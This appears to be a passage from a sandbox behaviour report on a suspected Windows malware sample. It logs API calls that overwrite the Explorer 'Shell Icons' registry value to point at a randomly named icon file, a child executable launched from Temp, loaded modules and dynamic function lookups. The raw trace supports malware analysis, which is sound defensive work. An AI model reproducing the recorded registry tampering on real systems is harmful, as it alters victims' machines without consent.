lpString1="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0116.556] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.556] lstrlenW (lpString="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 67 [0116.556] StrChrIW (lpStart="HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons", wMatch=0x5c) returned="\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons" [0116.556] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0116.556] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 3 [0116.556] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_USER", cchCount2=-1) returned 3 [0116.556] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCR", cchCount2=-1) returned 3 [0116.556] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CLASSES_ROOT", cchCount2=-1) returned 3 [0116.556] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKCC", cchCount2=-1) returned 3 [0116.556] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKEY_CURRENT_CONFIG", cchCount2=-1) returned 3 [0116.557] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKLM", cchCount1=-1, lpString2="HKLM", cchCount2=-1) returned 2 [0116.557] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.557] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.557] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.557] StrChrIW 
(lpStart="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons", wMatch=0x5c) returned="\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons" [0116.557] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.557] StrChrIW (lpStart="Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons", wMatch=0x5c) returned="\\Windows\\CurrentVersion\\Explorer\\Shell Icons" [0116.557] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.557] StrChrIW (lpStart="Windows\\CurrentVersion\\Explorer\\Shell Icons", wMatch=0x5c) returned="\\CurrentVersion\\Explorer\\Shell Icons" [0116.557] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.557] StrChrIW (lpStart="CurrentVersion\\Explorer\\Shell Icons", wMatch=0x5c) returned="\\Explorer\\Shell Icons" [0116.557] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.557] StrChrIW (lpStart="Explorer\\Shell Icons", wMatch=0x5c) returned="\\Shell Icons" [0116.557] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.557] StrChrIW (lpStart="Shell Icons", wMatch=0x5c) returned 0x0 [0116.557] SetLastError (dwErrCode=0x490) [0116.557] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.557] SetLastError (dwErrCode=0x0) [0116.557] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons") returned 62 [0116.558] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/v", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 2 [0116.558] lstrlenW (lpString="29") returned 2 [0116.558] lstrlenW (lpString="29") returned 2 [0116.558] StrChrW (lpStart=" \x09", wMatch=0x32) returned 0x0 [0116.558] StrChrW (lpStart=" \x09", wMatch=0x32) returned 0x0 [0116.558] StrChrW (lpStart=" 
\x09", wMatch=0x39) returned 0x0 [0116.558] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0116.558] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0116.558] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0116.558] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0116.558] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/t", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 2 [0116.558] StrDupW (lpSrch="REG_SZ") returned="REG_SZ" [0116.558] lstrlenW (lpString="REG_SZ") returned 6 [0116.558] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0116.558] StrChrW (lpStart=" \x09", wMatch=0x52) returned 0x0 [0116.558] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0116.558] StrChrW (lpStart=" \x09", wMatch=0x47) returned 0x0 [0116.558] StrChrW (lpStart=" \x09", wMatch=0x5f) returned 0x0 [0116.558] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0116.558] StrChrW (lpStart=" \x09", wMatch=0x5a) returned 0x0 [0116.558] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="REG_SZ", cchCount1=-1, lpString2="REG_SZ", cchCount2=-1) returned 2 [0116.688] LocalFree (hMem=0x2ee330) returned 0x0 [0116.688] SetLastError (dwErrCode=0x0) [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, 
dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 3 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="-d", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/f", cchCount1=-1, lpString2="/f", cchCount2=-1) returned 2 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/v", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-v", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/ve", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-ve", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/t", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-t", cchCount2=-1) returned 1 [0116.688] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/s", cchCount2=-1) returned 1 [0116.689] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="-s", cchCount2=-1) returned 1 [0116.689] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="/d", cchCount1=-1, lpString2="/d", cchCount2=-1) returned 2 
[0116.689] lstrlenW (lpString="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0") returned 72 [0116.689] SetLastError (dwErrCode=0x0) [0116.689] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x10f99c, lpdwDisposition=0x10f974 | out: phkResult=0x10f99c*=0x50, lpdwDisposition=0x10f974*=0x2) returned 0x0 [0116.689] RegQueryValueExW (in: hKey=0x50, lpValueName="29", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x2 [0116.689] lstrlenW (lpString="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0") returned 72 [0116.689] RegSetValueExW (in: hKey=0x50, lpValueName="29", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0", cbData=0x92 | out: lpData="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\Windows\\7l6OWDI9Fmrsoy1O.ico,0") returned 0x0 [0116.689] RegCloseKey (hKey=0x50) returned 0x0 [0116.690] SetLastError (dwErrCode=0x0) [0116.690] GetLastError () returned 0x0 [0116.690] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x10f948, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x2238\x2f\xf954\x10\x3176\xf7\xfa10\x10\x3753\xf7") returned 0x27 [0116.691] GetLastError () returned 0x0 [0116.691] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0116.691] SetLastError (dwErrCode=0x0) [0116.691] LocalFree (hMem=0x2f2238) returned 0x0 [0116.691] __iob_func () returned 0x76b32900 [0116.691] _fileno (_File=0x76b32920) returned 1 [0116.691] _errno () returned 0x1307d8 [0116.691] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.691] _errno () returned 0x1307d8 [0116.691] GetFileType (hFile=0x7) returned 0x2 [0116.691] GetStdHandle (nStdHandle=0xfffffff5) 
returned 0x7 [0116.691] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x10f908 | out: lpMode=0x10f908) returned 1 [0116.691] __iob_func () returned 0x76b32900 [0116.691] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0116.691] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0116.691] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x2f23f0*, nNumberOfCharsToWrite=0x27, lpNumberOfCharsWritten=0x10f930, lpReserved=0x0 | out: lpBuffer=0x2f23f0*, lpNumberOfCharsWritten=0x10f930*=0x27) returned 1 [0116.694] exit (_Code=0) Process: id = "57" image_name = "w588h5dn.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\w588h5dn.exe" page_root = "0x7ea16780" os_pid = "0xe5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "52" os_parent_pid = "0xe10" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\w588H5dN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"CIP_STARTED\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8404 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8405 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 8406 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 8407 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 
region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8408 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8409 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8410 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8411 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 8412 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8492 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8493 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8494 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 8495 start_va = 0x2b0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 8496 start_va = 0x710000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 8497 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 
"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8498 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8499 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 8500 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8501 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 8502 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8503 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8504 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8505 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8506 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type 
= mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 8507 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8508 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 8509 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8510 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8511 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8512 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8513 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8562 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 8563 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 8564 start_va = 0x2c0000 end_va = 0x3c0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 8565 start_va = 0x810000 end_va = 0x140ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 8566 start_va = 0x520000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 8608 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8609 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8610 start_va = 0x660000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 8611 start_va = 0x1410000 end_va = 0x16defff entry_point = 0x1410000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8612 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 8613 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 8621 start_va = 0x3d0000 end_va = 0x3e0fff entry_point = 0x3d0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 8622 start_va = 0x16e0000 end_va = 0x17dffff entry_point = 0x0 region_type = private name = "private_0x00000000016e0000" 
filename = "" Region: id = 8623 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 8624 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 8625 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 8626 start_va = 0x17e0000 end_va = 0x196ffff entry_point = 0x0 region_type = private name = "private_0x00000000017e0000" filename = "" Region: id = 8627 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 8628 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 8677 start_va = 0x17e0000 end_va = 0x18dffff entry_point = 0x0 region_type = private name = "private_0x00000000017e0000" filename = "" Region: id = 8678 start_va = 0x1930000 end_va = 0x196ffff entry_point = 0x0 region_type = private name = "private_0x0000000001930000" filename = "" Region: id = 8679 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 8680 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Thread: id = 91 os_tid = 0xe60 [0116.991] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 
0x76910000 [0116.991] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0116.991] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0116.991] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 0x76950e91 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0116.992] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") 
returned 0x7695bcb4 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0116.993] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0116.994] GetProcAddress (hModule=0x76910000, 
lpProcName="GetThreadTimes") returned 0x76945bfd [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0116.994] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0116.995] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 
